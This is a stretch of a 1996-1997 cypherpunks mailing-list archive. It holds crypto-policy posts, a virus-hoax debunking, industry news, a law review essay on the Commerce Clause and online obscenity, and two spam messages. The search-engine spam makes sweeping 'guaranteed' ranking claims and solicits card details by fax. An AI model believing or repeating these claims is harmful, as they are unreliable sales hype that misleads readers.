SHIP TO:
______________________________         ____________________________
Name                                                                   Phone Number

______________________________         ____________________________
Address                                                              Email Address

______________________________       Be sure to write address exactly
City, State, Zip                                                 as it should be written on a mail 
                                                                             piece.

______________________________         ____________________________
Country                                                                Email Alias you want

WE ACCEPT US FUNDS ONLY!  Please make checks payable to ->   LSAT

*** If you would like ONLY a FREE EMAIL ACCOUNT - Respond WITHIN  10 Days - Fill out 
      the form completely.  (US) $1.00 Handling + SASE - (INTERNATIONAL) - $2.50 Handling.
------- End of forwarded message -------

--Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian@firstgear.com
Date: Tue, 21 Oct 1997 13:50:36 -0700 (PDT)
To: brian@firstgear.com
Subject: YOUR LISTING ON YAHOO!
Message-ID: <199610210131.VAA05690@mail.firstgear.com>
MIME-Version: 1.0
Content-Type: text/plain


engines,
 it is becoming more and more difficult to be found among the MILLIONS of
 listings.  
 
 If you"re like the rest of us you have found it extremely frustrating.
You
 spend lots of time and money developing your site and then you're listed
 number 30, or 80, or even 200th.  You're NEVER FOUND.
 
 
                     ***************************
                             GOOD NEWS
 
 
 The good news is we have found a SOLUTION. After months of fighting the
 search engine battle we got LUCKY. 
 
 A programmer recently became associated with our firm who had done some
 CONSULTING WORK for six months with one of the major search engines. With
 his help we developed a REPORT on the major search engines and how they
 really work.
  
 
                    *****************************
 REPORT 
 
 His report is excellent. We have been using the material in the report
for
 over five months. IT WORKS!  With it, our sites are in the top TEN
listings
 on all major search engines and we have experienced a virtual stampede of
 people to the web sites.  
 
                      
 HITS ARE UP, SALES ARE UP, and most importantly, everyone is HAPPY.
 
 
                     ***************************
                             YOUR COPY
 
 
 Now, YOU CAN HAVE A COPY of his report.  In it you will find:
 
 
 
           How to vault in the TOP TEN  on any search engine using any
 keyword. Strategies that put you ahead of 95% of the other sites online.
 
            How to STAY in that TOP TEN.
 
            How to improve your chances of being found in about 10
MINUTES.
 
           How the search engines calculate CONFIDENCE ratings (and what
 that means to you).  
 
           Killer META TAGS that totally blow away your competitors.
 
           Which search engines are the very BEST FOR YOU.
 
           How to get your site REGISTERED for FREE at over 200
locations,
 in one easy step (it takes 10 minutes).
 
           How to BLOCK out part of your site from the search engines
(and
 why you should do it).
 
           The effect of REPEATING KEY WORDS. (good or bad?) What happens
 when you repeat them too many times?
 
          LATEST FORMS for developing the best meta tags. Meta Tag
 strategies that can broaden your audience and build high volume web
traffic
 for you.  
 
 We tell you exactly what to do and show you SPECIFIC EXAMPLES.  And it's
 SIMPLE and EASY to understand.  So you can put the principles to
immediate use.
 
           The benefits of site UPDATING.  How often?
 
            What NOT to do! Avoid making those errors which can cost you.
 
 
                          and even
 
           How to legally "steal" your competitor's web traffic and send
it
 to your site. Type in your competitor's name and YOUR NAME will appear
FIRST! 
 
 
                     ***************************
                   
                         WHAT DOES IT COST?
 
 
 
 The material is only $15, and is unconditionally guaranteed to work
for you.
 
 Just follow the instructions and you will find your site in the top ten
too.
 
 Ordering is SAFE and EASY. For more information, or to RECEIVE this 18
page
 report by email just go to our INSTANT-DELIVERY SECURE order form at:
 
 
             http://www.lr-publishing.com/SES2/
 
 (Order on line and you will receive your report in JUST 60 SECONDS.)
 
 
 
 Now that your site is up shouldn't you take this MOST IMPORTANT LAST STEP
so
 people can find it.
 
 
                   ******************************                        
                      UNCONDITIONAL GUARANTEE  
 
 
 Remember, we UNCONDITIONALLY GUARANTEE IT WORKS.
   
 You can't lose.
 
 
                   ********************************
                        SPECIAL FREE BONUS
 
 
 Order within 48 hours, we and will include, AS A FREE BONUS, information
on
 over 500 SEARCH ENGINES and directories where you can list your site for
 free. (Some are very specialized and targeted).
 
 
 SPECIAL NOTE: If you are busy and don't have time to go to our web site
 INSTANT-DELIVERY SECURE ORDER FORM, you can order by FAX. (The
unconditional
 guarantee still applies!) 
 
 
 Just fill in the FAX FORM AT THE BOTTOM OF THIS PAGE.  Then FAX it to us
at:
 
                             1-305-289-1884
 
 
 If you order by FAX your copy of the report will be sent to you by email
 within 24 hrs. Or, if you prefer, you can send your order with a CHECK by
 snail mail to the address below. (Be sure to include your email address
for
 delivery.)
 
 
 Whichever method you choose to order, YOU'LL BE GLAD YOU DID!
 
  Best of luck with your web site!
 
 
 
 
 Leeds Publishing
 5800 Overseas Hwy., St. 35-154
 Marathon Key, Fl.  33050
 Fax 305-289-1884
 http://www.lr-publishing.com/SES2/
 ________________________________________________________________________
                             
 ________________________________________________________________________
 
                                   FAX ORDER FORM
                               (Please print clearly)
 
 FAX TO: Leeds Publishing
 
 FAX NUMBER: 1-305-289-1884
 
 Hi:  Here is my order for Search Engine Secrets at $15 only. I
understand
 it is unconditionally guaranteed. Include my FREE BONUS of 500 search
 engines.  Send by email ASAP.
 
 Date:__________________
 
 NAME:_______________________________________________
 
 E-MAIL
 ADDRESS:______________________________________________________________
 (PLEASE be accurate.  One small error and we can't send your order).
 
 CARD TYPE:_________________
 
 CARD NUMBER:_________________________________________________
 
 EXPIRATION DATE:______________
 
 NAME ON CARD:________________________________________________
 
 
 Thanks for ordering.  Your copy of the report will be sent to you by
email
 ASAP.
 
 ____________________________________________________________
 ____________________________________________________________
 
 
 Copyright 1997 Leeds and Rousseau Publishing.  All rights reserved.
 Form 10-16 GD-Yahoo
 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian@firstgear.com
Date: Wed, 22 Oct 1997 15:42:43 -0700 (PDT)
To: brian@firstgear.com
Subject: 30¢ a click, paid weekly!
Message-ID: <199610221041.GAA26178@mail.firstgear.com>
MIME-Version: 1.0
Content-Type: text/plain


Send More, Convert More & Earn More!
Want to get paid what your traffic is really worth?
Sign up and we'll show you how!

http://www.More4Clicks.com



This message is intended for Webmasters, we want to help you make your site 
profitable.  We apologise for any intrusion.  

mailto:emissary@lostvegas.com?subject:remove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Morbid Angel <anon333@cryogen.com>
Date: Tue, 10 Dec 1996 18:05:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: FW: Hoax: the "Deeyenda" virus (was ... VIRUS ALERT ...)
Message-ID: <325D9BB8.1345@cryogen.com>
MIME-Version: 1.0
Content-Type: text/plain


found in a Usenet posting:

-----------------------------------
>From Melvin Klassen <KLASSEN@UVVM.UVIC.CA>
Date: Wed, 4 Dec 1996 12:00:00 PST
Newsgroups: bit.listserv.help-net

MIKE R BLAKE <> writes:
>>> FYI...
>>>          **********VIRUS ALERT**********
>>> There is a computer virus that is being sent across the Internet.  If
>>> you receive an email message with the subject line "Deeyenda", DO NOT
>>> read the message, DELETE it immediately!

Nonsense.  Your message is a **HOAX** !

Instead, check the "Computer Virus Myths Home Page",
and the specific page describing "Deeyenda", at:

http://www.kumite.com/myths/myth027.htm

>>>          FCC WARNING!!!!! -----DEEYENDA PLAGUES INTERNET

The FCC (Federal Communications Commission) does not issue such
messages.
It's not part of their mandate to do such.


-- 
returning to lurk mode...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dildophus <dildo@americanbanker.com>
Date: Sat, 9 Nov 1996 01:54:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: French Smart Card Firms in Merger Deal
Message-ID: <327725C1.380@americanbanker.com>
MIME-Version: 1.0
Content-Type: text/plain


NEW YORK -- Schlumberger Electronic Transactions, a leading French smart
card company, said Wednesday it signed a letter of intent to acquire
Soliac, a unit
of the French processing company Sligos that makes magnetic stripe and
smart cards.

The Schlumberger company's agreement to buy Solaic points to further
consolidation in the smart card industry, which has seen a number of
joint ventures
and acquisitions in the past year.

Solaic has manufacturing facilities in France and Spain. Its marketing
operations are
primarily in those countries, Germany, and the United Kingdom.

The proposed transaction, which is subject to the signing of definitive
agreements,
would include a partnership to develop smart-card-based systems.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dildophus <dildo@americanbanker.com>
Date: Sat, 9 Nov 1996 01:58:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: FICS Group to Build On Microsoft Platform
Message-ID: <327726BB.5F2D@americanbanker.com>
MIME-Version: 1.0
Content-Type: text/plain


BRUSSELS -- FICS Group, an international banking systems company,
announced a major electronic delivery initiative based on Microsoft
Corp.
technology.

Expanding on the personal computer and telephone modes of banking
service
delivery, FICS said it is expanding into smart phones, personal digital
assistants and
wireless phones, electronic wallets, and Internet-based services.

Microsoft platforms play a major role in FICS offerings, and Microsoft's
Activex
technology will be employed in Internet development.

"The fact that FICS has chosen Windows NT as one of its key development
platforms and adheres to the Open Financial Connectivity standard makes
the
company a valuable partner for Microsoft," said Ashley Steele, the
Redmond,
Wash., software company's marketing manager for the banking industry.

FICS also participates in the Tandem Computers Inc. "payments factory"
program,
also based on Windows NT.

Separately, FICS said it entered into a strategic partnership with
Swift, the global
banking telecommunications network. As a Level 3 partner, FICS is one of
a few
select firms that exchange strategic information with Swift and promote
each other's
products.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 9 Oct 1996 14:21:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BBS generator
Message-ID: <844888870.2598.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone here know the approximate ammount of output from a BBS 
PRNG needed to predict with some certainty the next bit or bits? - is 
the generator totally secure, ie. do you need to factor to predict or 
is there an attack using the output?


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 9 Oct 1996 14:53:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Not content with the CDA, Sen. Exon derails Pro-CODE
Message-ID: <v01510113ae808cd749e7@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



*********

Date: Tue, 8 Oct 1996 17:54:52 -0500
To: fight-censorship-announce@vorlon.mit.edu
From: declan@well.com (Declan McCullagh)
Subject: Not content with the CDA, Sen. Exon derails Pro-CODE

When the White House wanted to derail pro-encryption legislation, they
knew where to turn: to the infamous author of the even more infamous
Communications Decency Act.

Last month Sen. Jim Exon (D-Nebraska) wrote the attached letter to Sen.
Pressler, chair of the commerce committee, days before the ProCODE
pro-crypto bill would have cleared its last hurdle in committee then moved
to the floor of the Senate for a vote. Because of Exon's threatened
"several amendments" that would defang the bill, the markup never
happened.

Thanks to Exon, it didn't have a chance.

But don't blame the retiring senator from Nebraska. Not only are your
electrons wasted, he's not the true culprit. It was the White House, in
thrall to the Justice Department: Gore advisor Greg Simon made the calls
to Exon's office that prompted this letter to Pressler.

-Declan
http://fight-censorship.dementia.org/top/

Background: http://www.hotwired.com/muckraker/96/36/index4a.html

******

September 9, 1996

The Honorable Larry Pressler
Chairman
Senate Commerce, Science and Transportation Committee
243 Russell Senate Office Building
United States Senate
Washington, DC 20510

Dear Senator Pressler:

I understand that the Senate Commerce Committee may have a markup this
week to consider the so-called Pro-CODE computer encryption bill.

As you know, the computer industry has had a series of high-level
discussions with the President, Vice President, and the government's
national security experts. I am hopeful that these discussions will
produce substantial and meaningful reform in the current export regime for
encryption software. Given the national security and law enforcement
implications of the proposed legislation, to rush into a mark-up before
these concerns are resolved would be a mistake.

If the measure is taken up on Thursday, I would expect that there would be
several amendments.

With best wishes,

Sincerely,

Jim Exon
United States Senator

cc The Honorable Fritz Hollings

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Oct 1996 10:34:11 -0700 (PDT)
To: dlv@bwalk.dm.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <7LNFVD15w165w@bwalk.dm.com>
Message-ID: <199610081955.UAA00221@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis <dlv@bwalk.dm.com> writes:
> [...]
> Another possibility is to issue a charge card (payable in full at
> the end of the month, getting revenue from the annual fee), rather
> than a credit card, so it could claim not to be subject to certain
> Federal Reserve's regulations that have to do with credit card
> disputes. But then it probably can't be Visa/MC and can't use their
> clearginhouses.

I have a VISA card which is purely a debit card.  It is accepted all
the places any standard VISA card would be.  (UK, Lloyds bank).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Oct 1996 10:36:47 -0700 (PDT)
To: frissell@panix.com
Subject: Re: Londinium
In-Reply-To: <3.0b19.32.19961007110200.00a064b8@panix.com>
Message-ID: <199610082046.VAA00238@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell <frissell@panix.com> writes:
> [whilst in London...]
> The interesting thing about "Schoolyard Slaughter" is that similar games
> involving adult males and aliens ("Doom" par example) have been around for
> a long time.  The lesser controversy surrounding games like Doom suggests
> that the commentators (and perhaps the public) are guilty of speciesism,
> ageism, and gender bias.  After all, the fictional slaughter of adult males
> and aliens should be just as bad as the fictional slaughter of children. 

May be you knew this.  A few months back in the UK, some nut flipped
and shot up a school full of kids, finishing up by shooting himself
(sadly for the press, his second cousin once removed, did not have an
internet account).  Much media teeth gnashing about hand guns, and
tighter gun laws ensued.  (The guy had a gun license, something which
is needed to legally own a gun in the UK.)

The Schoolyard Slaughter game is I think a joke by someone with a
funny sense of humor, playing on this incident.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Oct 1996 10:35:57 -0700 (PDT)
To: JR@ROCK.CNB.UAM.ES
Subject: Re: crypto cd once more
In-Reply-To: <961008152334.20601645@ROCK.CNB.UAM.ES>
Message-ID: <199610082109.WAA00247@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



> [CDROM format discussion]

> ObCrypto:
> [...]
> 	And, is there any possibility of making an international
> version of it?

I get the impression that this is the case.  Remo Pini is Swiss,
rpini.com is in Switzerland.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 9 Oct 1996 05:22:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Porn and commerce
Message-ID: <199610091207.FAA06125@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


           Copyright (c) Virginia Law Review Association 1996.
                           Virginia Law Review

                              April, 1996

                           82 Va. L. Rev. 535

ESSAY: VIRTUAL REALITY AND "VIRTUAL WELTERS": A NOTE ON THE COMMERCE 
	     CLAUSE IMPLICATIONS OF REGULATING CYBERPORN

			Glenn Harlan Reynolds

    In recent months, there has been a great deal of publicity regarding 
the availability of pornography over the Internet and other computer 
networks, along with proposals for regulation. n1 Recent months have 
also seen the prosecution of one couple, located in California, by  
authorities in Memphis, Tennessee, for the contents of a computer 
bulletin board they operated. n2 According to media accounts, the Memphis 
location was chosen for its conservative juries, who were expected to be 
unsympathetic to Bay Area pornographers. n3 No doubt more such  
prosecutions, by both federal and state and local authorities, are on the
horizon.
 
    As the first of its kind, this prosecution raises interesting  
questions regarding the appropriateness and nature of "community  
standards" n4 developed to deal with local entities like bookstores n5 
and movie theaters n6 as applied to almost locationless entities such as 
computer bulletin board systems. Indeed, the American Civil Liberties 
Union has argued in court that the appropriate community standard for 
such cases is that of the online community, rather than of any particular 
geographic area. n7
 
    My point here, though, is a narrower one: that we need not even  
reach the First Amendment to discover serious difficulties with  
locality-based regulation of computer bulletin board systems. Instead, we 
may look to the Supreme Court's Commerce Clause jurisprudence for some 
useful guidance on the inappropriateness of such regulation. Only where 
regulations pass the Commerce Clause test is it even necessary to address 
First Amendment issues, and, as I will suggest, even there the test 
provides significant guidance.

   Computer Bulletin Boards

Most readers by now are familiar with computer networks and bulletin  
boards, but a brief review may nonetheless be helpful. Traditional  
publishing of books, magazines, and movies gave the publisher  
near-complete control over their markets and destinations. Typically, 
sales required local distributors (bookstores, movie theaters, etc.), who 
would be knowledgeable concerning local laws and mores and who could 
limit purchases by minors.  

    Computer bulletin boards, on the other hand, work quite differently. 
When accessed via the Internet, all computers are virtually equidistant: 
as I can attest from personal experience, it is no more trouble to 
browse the collection of a library in Sydney, Australia than of the one 
next door. Computer "publishers" do not distribute the product to their 
customers; their customers come to them. A user desiring to acquire 
sexual images (or, for that matter, plans for building birdhouses) must 
seek out the service in question and download the product, having it 
sent over the network to his or her computer. Not only do the operators 
of such services have no local presence, nothing takes place in the 
customer's geographic location that is not initiated by the customer. 
Thanks to the proliferation of computer technology, computer bulletin 
board services (both free and for profit) have become numerous. An 
individual service might, in a given day, reach millions of users in 
scores of different states and nations.

   The Interstate Sales Tax Analogy
 
Although this fact has generated a great deal of interesting First  
Amendment literature already, with more certain to be on the way, it raises 
another issue that has so far received no attention. In short, the 
trading of information (including, but not limited to, sexually explicit 
information) among states is interstate commerce. State regulation of 
interstate commerce is subject to limits, even where Congress has not 
acted, under the so-called "dormant" Commerce Clause. n8
 
    In a strikingly similar situation, the Supreme Court has repeatedly 
struck down state laws aimed at commercial activity that, but for its 
multistate character, would otherwise be subject to state power. These 
cases involve state efforts to apply sales tax laws to interstate  
catalog merchants.

    The leading case is Quill Corp. v. North Dakota, n9 decided in 
1992. Quill involved an effort by North Dakota's taxing authorities to 
levy sales taxes on Quill's catalog sales in North Dakota, a somewhat 
cheeky effort in light of the Supreme Court's 1967  National 
Bellas Hess decision that barred just that sort of thing. n10 Quill had 
no physical presence in the state. Its only contact was the mailing of 
catalogs and flyers to customers in North Dakota. North Dakota maintained 
that this was sufficient contact with the state to support taxation. 
Quill Corp. argued that such taxation violated its due process rights, 
and furthermore was inconsistent with the Commerce Clause.
 
    The Supreme Court rejected the due process argument, holding that 
the purposeful mailing of 24 tons of catalogs and flyers per year into 
North Dakota was sufficient contact with the state to support taxation. 
According to the Court, this conduct indicated that "Quill has  
purposefully directed its activities at North Dakota residents." n11 In 
light of this behavior, the Court held, subjecting Quill to taxation did 
not offend due process.
 
    Nonetheless, the Court found the taxation impermissible on the  
distinct ground of interstate commerce. Although the Court found sufficient 
"minimum contacts" to satisfy due process, it also found that there was not 
the "substantial nexus" needed to satisfy the Commerce Clause. "Despite 
the similarity in phrasing," the Court said, "the nexus requirements of 
the Due Process and Commerce Clauses are not identical. The two standards 
are animated by different constitutional concerns and policies." n12 In 
short, although due process relates to individual fairness, Commerce 
Clause concerns in this context have to do with "structural concerns 
about the effects of state regulation on the national economy." n13
 
    In the case of state sales taxes, the Court's concern was that  
subjecting interstate businesses to a multiplicity of inconsistent state 
sales tax laws would place a substantial burden on interstate commerce 
even if each individual sales tax were reasonable. As the Court said:

On its face, North Dakota law imposes a collection duty on every vendor 
who advertises in the State three times in a single year. Thus, absent 
the Bellas Hess rule, a publisher who included a subscription card in 
three issues of its magazine, a vendor whose radio advertisements were 
heard in North Dakota on three occasions, and a corporation whose  
telephone sales force made three calls into the State, all would be  
subject to the collection duty. What is more significant, similar  
obligations might be imposed by the Nation's 6,000-plus taxing  
jurisdictions. n14
 
The Court went on to quote Bellas Hess to the effect that the resulting 
"many variations in rates of tax, in allowable exemptions, and in  
administrative record-keeping requirements could entangle [a mail-order 
house] in a virtual welter of complicated obligations." n15 Because such 
complexity would subject interstate commerce to a burden that would not 
apply to intrastate operators, it constitutes a discrimination against 
interstate commerce that cannot be permitted under the Commerce Clause. 
n16 As a result, the Court struck down North Dakota's effort to tax Quill.
 
    From the Quill and Bellas Hess cases, then, we learn that even uses 
of state authority that are otherwise unexceptionable, such as the 
application of sales taxes, can be impermissible where the existence of 
multiple standards would create a significant burden for entities whose 
activities cross multiple states. n17 If this "interstate burden"  
analysis is sufficient to bar state action in the extremely important 
area of taxation, then it is difficult to see why it should not apply 
with equal force in the area of obscenity law. Taxation,after all, is 
the lifeblood of the state; regulation of obscenity can certainly
rank no higher on the scale of state interests, and quite probably 
falls several steps further down even if the important First Amendment 
aspects are not taken into account.
 
    These cases, and the principles that lie behind them, raise two  
important points. Most obviously, it would appear that state or local 
regulation of communication over computer networks on obscenity grounds 
is very likely a violation of the dormant Commerce Clause because of the 
variations produced by the community standards doctrine. After all, if it 
is too much of a burden for interstate merchandisers to keep track of 
variations in state sales tax rates and classifications, it certainly 
must be too great a burden for interstate publishers to keep track of 
variations in the far less certain "community standards" of obscenity and 
indecency.

    The second and perhaps more important point is that if we are willing to
grant interstate sellers of office equipment and porcelain "collector" 
dolls such extensive protection from local interference in the name of 
protecting commerce, surely we should be even more willing to provide such 
protection in the name of free speech. For the protection provided by the 
dormant Commerce Clause is merely a matter of judicial inference; the 
value of a free press, on the other hand, is explicitly spelled out in 
the First Amendment.

    Such an approach would, of course, limit the ability of communities to
develop unique standards of obscenity, and move us closer toward a 
uniform national standard. n18 While that development is not without its 
drawbacks,neither are the many other movements toward uniformity 
mandated by the Constitution. But we have accepted them nonetheless. n19
 
    Taking this approach seriously would mean barring prosecutions, 
under state or local law, of out-of-state individuals and entities for 
obscenity where the material in question came via computer connections. More 
interestingly, it would also mean that courts should regard even federal 
prosecutions that employ local community standards with a considerable 
degree of suspicion. For while Congress is generally regarded as having 
the power to override dormant Commerce Clause considerations through 
appropriate legislation, we should be reluctant to assume that it has 
done so by implication, simply because of the existence of federal 
criminal laws. n20 The idea of a national market, after all, is one that 
Congress may override through the passage of appropriate legislation,  
n21 but that is a far cry from saying that federal prosecutors should be 
able to do the same.
 
    Whether my suggestion will be taken seriously, on the other hand, 
is an open question at best. For one thing, it must overcome the natural 
tendency of academics, journalists, and judges to rush to the First 
Amendment whenever an issue involving speech or publication appears. For 
another, it must overcome the equally natural tendency to forget that 
parts of the Constitution outside the Bill of Rights  - even the Commerce 
Clause - may serve as important guarantors of liberty. And aside from 
these hurdles, it requires a recognition, that there is still a role for 
the nationalist parts of the Constitution, despite today's resurgence of 
interest in the powers of states and in dlimitations on the federal 
government. n22
 
    Despite all of these trends and tendencies, I think that there is 
still room to ask whether it is appropriate, or even constitutional, to 
allow states to govern expression under circumstances in which they would 
not be permitted to collect sales taxes on sales of Elvis dolls or K-Tel 
merchandise. Where it has been necessary, we have managed to update our 
view of the Constitution to accommodate changes in technology. It is time 
that we do so again. 



Glenn Harlan Reynolds in an Associate Professor of Law at the University of 
Tennessee. He holds a J.D. from Yale Law School and a B.A. from the
University of Tennessee. He is a member of the Advisory Board at the Center 
for Constitutional Issues in Technology. 

Fran Ansley, Fred LeClercq, Arnold Loewy, Gene Volokh and Larry Yackle 
provided helpful comments on this Essay. Kimberly Watson and Mark Vane 
provided valuable research assistance.


- - - - - - - - - - - - - - - - - -Footnotes- - - - - - - - - - - - - - - - -

   n1. Two cover stories in national news magazines fueled this interest. 
See Philip Elmer-Dewitt, On a Screen Near You, Time, July 3, 1995, at 
38; Steven Levy, No Place for Kids?, Newsweek, July 3, 1995, at 47. The 
Time story, based on a heavily-criticized study at Carnegie-Mellon 
University, itself came in for a great deal of criticism. See, e.g., 
Jeff Cohen & Norman Solomon, Time Magazine Pulls Cyberhoax on America, 
Ariz. Republic, July 24, 1995, at B5; William Webb, Too Much Porn on 
Internet - or in the Press?, Editor and Publisher, July 22, 1995, at 30. 
For more on the Carnegie-Mellon study itself see Bill Schackner and 
Dennis Roddy, Internet Brouhaha Entangles Researcher, Pittsburgh 
Post-Gazette, July 24, 1995, at A1. This publicity led to the passage of 
the so-called Communications Decency Act while this article was 
approaching publication. See Communications Decency Act of 1996, Pub. L. 
104-104, 110 Stat. 133, codified at 47 U.S.C. 223(a)-(h) (signed Feb. 8, 
1996). If ultimately upheld, this Act may answer some of the questions  
raised in this Essay, since Congressional action eliminates dormant 
Commerce Clause concerns. Important parts of the Act have been enjoined, 
however, by American Civil Liberties Union v. Reno, Civ. A. 96-963, 1996 
WL 65464, 1996 U.S. Dist. LEXIS 1617 (Feb. 16, 1996). In another sense, 
the points raised by this Essay remain important even if the 
Communications Decency Act is upheld. Legislation comes and goes, after 
all, but constitutional concerns are far more permanent.

   n2. United States v. Thomas, Nos. 94-6648, 94-6649, 1996 U.S. App. 
LEXIS 106 (6th Cir. Jan. 29, 1996).

   n3. Joshua Quittner, Computers in the 90s, Newsday, Aug. 16, 1994, 
at B27.

   n4. See generally Miller v. California, 413 U.S. 15 (1972)  
(establishing the Miller test for obscenity, and stating that reference 
to community standards is constitutionally adequate, as people in 
different states vary in their tastes and their attitudes).

   n5. See, e.g., American Booksellers Ass'n v. Hudnut, 771 F.2d 323 
(7th Cir. 1985), aff'd, 475 U.S. 1001 (1986).

   n6. See, e.g., Jenkins v. Georgia, 418 U.S. 153 (1974) (involving 
film Carnal Knowledge).

   n7. Brief Amicus Curiae of the American Civil Liberties Union 
Foundation at 20-31, Thomas v. United States, Nos. 94-6648, 94-6649, 1996 
U.S. App. LEXIS 1069 (6th Cir. 1996) (Copy on file with Virginia Law 
Review Association). In the interest of full disclosure, I should admit 
that I consulted with the ACLU attorneys working on this brief, and 
suggested that they make this argument. It is thus not surprising that I 
find it interesting. For a more general discussion on the kinds of 
free-speech problems raised by new technologies see Robert P. Merges & 
Glenn H. Reynolds, News Media Satellites and the First Amendment: A
Case Study in the Treatment of New Technologies, 3 High Tech. L.J. 1 
(1989).

   n8. For a good overview of the Supreme Court's dormant Commerce 
Clause jurisprudence see Donald Regan, The Supreme Court and State 
Protectionism: Making Sense of the Dormant Commerce Clause, 84 Mich. L. 
Rev. 1091 (1986).

   n9. 112 S. Ct. 1904 (1992).

   n10. National Bellas Hess v. Dep't of Revenue, 386 U.S. 753 
(1967).

   n11. 112 S. Ct. at 1911. In National Bellas Hess, supra note 10, the 
Court had endorsed such a due process argument. Although it is beyond  
the scope of this brief Essay, I note that while the mailing of flyers in 
quantity was found in Quill to indicate that the corporation had  
"purposefully directed" its activities toward North Dakota residents, the 
same could not be said to apply to the connection of a computer bulletin 
board system to the Internet or to telephone lines. Because computer 
systems are equally accessible from almost anywhere, the mere operation 
of such a system could not fairly be characterized as "purposeful 
direction." As a result, a Bellas Hess type due process argument might 
find considerably more purchase in this context.

   n12. 112 S. Ct. at 1913.

   n13. Id.

   n14. Id. at n.6.

   n15. Id.

   n16. Id. at 1913.

   n17. It is this principle that distinguishes a Quill approach.  
Although there is one recent case that might superficially appear 
inconsistent, on closer examination it turns out to fit the Quill mold as 
well. In Goldberg v. Sweet, 488 U.S. 252, 267 (1989), the Supreme Court 
upheld a state sales tax on interstate telephone calls against a dormant 
Commerce Clause challenge.  
           
   However, Goldberg's outcome was based on precisely the same  
considerations that I have laid out by reference to Quill. In Goldberg, 
the court stated that the tax on in-state consumers was permissible under 
the Commerce Clause because such an approach resulted in fair 
apportionment of the taxes, and no excessive burden on interstate 
commerce, since only two states (the originating state and the
terminating states) would be allowed to tax interstate calls. Id. at 
265. Indeed, the Court noted that any other approach (for example, one 
based on the path taken by the call) would violate the Commerce Clause 
because the billions of possible electronic paths that a call might take 
could otherwise "produce insurmountable administrative and technological 
barriers." Id. at 264-65. This is consistent with the "virtual welter" 
language of Quill, which no doubt explains why the Court itself did not 
view the two cases as inconsistent. Such an approach, I might add, also 
supports the "online community" standard urged by the ACLU, which would 
have an analogous simplifying effect by subjecting a single service to 
only one standard, rather than a multiplicity of conflicting standards. 
See infra note 18.

   n18. Or maybe not. The American Civil Liberties Union's brief  
suggests that community standards might vary among online communities, or, 
alternatively, that some kinds of online obscenity might be placed 
effectively beyond regulation as a result of Stanley v. Georgia's privacy 
in the home doctrine. See Brief of the ACLU, supra note 7, at 27-31 
(citing Stanley v. Georgia, 394 U.S. 557 (1969) (holding that a state may 
not punish mere possession of obscene materials in home)).

   n19. Note that we already have a uniform national standard for  
indecency in broadcasting. FCC v. Pacifica Foundation, 438 U.S. 726 (1978). 

   n20. Cf. South-Central Timber Dev. v. Wunnicke, 467 U.S. 82, 91 (1984)
(requiring clear evidence of congressional intent to allow state regulations
inconsistent with dormant Commerce Clause). As one leading treatise puts it:

The Court will not find that Congress has removed state or local regulations
from the limits of dormant Commerce Clause principles unless Congress 
has expressly stated in legislative actions that the type of state 
regulation at issue is approved by Congress or unless the Court otherwise 
finds that Congressional intent to allow such state regulations of 
commerce is "unmistakably clear."
 
   John E. Nowak & Ronald D. Rotunda, Constitutional Law 282 (4th ed. 
1991). Such analysis is, obviously enough, not legally binding on federal 
prosecutors. But it should suggest caution where the kinds of prosecution 
discussed in this Essay are considered, by prosecutors or courts.

   n21. The dormant Commerce Clause is, of course, no barrier to 
congressional action. Congress remains free to legislate on the subject, 
and even to incorporate local standards of obscenity into such legislation - 
subject to whatever other constitutional provisions may apply. See Sable 
Communications of Cal. v. FCC, 492 U.S. 115, 124-126 (1989). Indeed, 
although I would oppose the Communications Decency Act, see supra note 1, 
on other grounds, there is no question that it answers these concerns 
and, if ultimately upheld, would largely eliminate them.

   n22. An interest, I stress, that is often justified. See generally  
Glenn H. Reynolds, Is Democracy Like Sex? 48 Vand. L. Rev. 1635 (1995) 
